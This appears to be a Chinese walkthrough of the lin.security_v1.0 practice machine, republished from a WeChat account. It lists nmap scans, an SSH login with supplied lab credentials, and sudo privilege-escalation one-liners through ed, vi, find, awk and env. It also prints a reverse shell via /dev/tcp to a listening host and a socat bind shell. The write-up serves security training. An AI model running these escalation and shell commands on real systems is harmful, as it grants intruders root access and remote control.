lin.security_v1.0
主机描述
用户提示:bob/secret
发现主机
nmap -sP 192.168.20.0/24
Nmap scan report for 192.168.20.104
扫描端口
nmap -sV -p- 192.168.20.104
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs 3-4 (RPC #100003)
40391/tcp open nlockmgr 1-4 (RPC #100021)
48165/tcp open mountd 1-3 (RPC #100005)
58339/tcp open mountd 1-3 (RPC #100005)
59003/tcp open mountd 1-3 (RPC #100005)
ssh登录
ssh [email protected]
bob/secret登录成功
查看可使用sudo的命令
sudo -l
sudo可使用的命令
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh,
/usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
/usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more,
/usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
/usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
/usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
sudo执行关于shell的命令
|
|
|
|
|
|
|
|
|
|
sudo执行关于文本编辑器命令
ed命令
功能最简单的文本编辑程序,一次仅能编辑一行
sudo ed
输入!/bin/sh
sudo ed
输入!/bin/bash
vi命令
经典的编辑器
sudo vi -c ':!/bin/sh' /dev/null
sudo vi -c ':!/bin/bash' /dev/null
sudo执行find命令
find选项
sudo find / -exec /bin/bash ;
通过 find 命令的 -exec 选项执行/bin/bash
反弹shell
攻击机:nc -nlvvp 8888
目标机:sudo find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.20.100/8888 0>&1 ;
通过 find 命令的 -exec 选项来反弹shell
sudo执行awk 命令
sudo awk 'BEGIN {system("/bin/bash")}'
sudo执行socat
socat是一个多功能的网络工具
目标机:sudo socat tcp-listen:6666,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane
攻击机:socat FILE:`tty`,raw,echo=0 TCP:192.168.20.104:6666
sudo执行env查询环境变量
sudo env /bin/sh
sudo env /bin/bash
OSCP+
原文始发于微信公众号(泷羽Sec-Ceo):靶场奇妙记之lin.security_v1.0
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论